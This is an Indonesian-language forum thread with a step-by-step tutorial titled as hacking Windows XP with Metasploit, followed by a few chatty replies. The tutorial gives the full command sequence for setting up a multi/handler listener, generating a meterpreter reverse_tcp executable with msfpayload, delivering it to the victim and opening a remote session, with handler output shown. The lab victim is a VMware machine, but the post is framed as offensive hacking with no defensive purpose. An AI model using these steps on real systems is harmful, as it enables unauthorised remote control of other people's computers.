[Share] Hacking windows XP Using Metasploit
#1
Tutorial hacking Windows XP menggunakan metasploit ini ane persembahkan sebagai hadiah untuk hujan dihari ini, loh .. hubungannya apa ? ahahahaahhah
lanjut ke tutor dah :

Tutor Tested On :

OS : Kali Linux
Victim : XP sp2 on VMware

Step by step :

1. Buka metasploit, kemudian gunakan exploit multi handler

msf > use exploit/multi/handler

2. Langkah selanjutnya kita set LHOSTnya

msf exploit(handler) > set LHOST (ip kita)

3.  Next step set LPORT nya

msf exploit(handler) > set LPORT 1234

NB : dalam set LPORT kita bebas menggunakan LPORT brapapun, dalam contoh ini ane make LPORT 1234

3. Sekarang kita buat Payloadnya, buka new console kemudian ketikkan comand dibawah ini :

[email protected]:~# msfpayload windows/meterpreter/reverse_tcp LHOST=<ip anda> LPORT=1234 x>/root/pentest.exe


NB : Payload kita buat dengan LHOST & LPORT yang sama dengan yang kita set di metasploit pada langkah sebelumnya, kemudian option  x>/root/pentest.exe berarti kita membuat payload dengan nama pentest.exe yang disimpan di direktory root

4.Selanjutnya kita set payload di metasploitnya menggunakan payload Windows/meterpreter/reverse_tcp

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp

5. Langkah selanjutnya kita kirimkan payload tersebut ke Victim target. berhubung ane make victim di vmware jadi tinggal share folder abis tu copy deh ... Big Grin

6. Kemudian ketikkan exploitnya di metasploit :

msf exploit(handler) > exploit

[*]Started reverse handler on <ip anda>:1234
[*]Starting the payload handler...

kira2 seperti itulah penampakan ketika korban belum mengeksekusi payload yang kita kirimkan tadi, sekarang ane coba eksekusi payloadnya

Spoiler! :
[Image: Screenshot_from_2014_11_28_17_31_30.jpg]

yap... sesion pun open ...selanjutnya silahkan bermain dengan meterpreter Big Grin

sekian dulu tutorial kali ini, semoga bisa bermanfaaat. maaf kalo gambarnya cuma ada yang trahir, soalnya untuk set payload,set LHOST & LPORT ane pikir udah pada ngarti Big Grin
salam .. jika ada yang kurang jelas monggo bertamu .. eh salah .. bertanya Big Grin

Jika tutorial ini bermanfaat ane kagak nolak ++ nya kok Big Grin
tutorial created by xcrew ..... jika ada yang kurang ane mohon maaf ... hanya niat untuk berbagi
Salam
Aku mah apa atuh ... cuma debu - debu mutiara , meskipun debu namun tetap berharga Smile

#2
@X Code : boleh ane tebak ini Nefrit Lk bukan ? Smile Big Grin

#3
@abdilahrf : Nefrit Lk ntu apa bang :3
Aku mah apa atuh ... cuma debu - debu mutiara , meskipun debu namun tetap berharga Smile

#4
@X Code : nama orang .. owh bukan toh wkwkwk salah orang =))






Users browsing this thread: 1 Guest(s)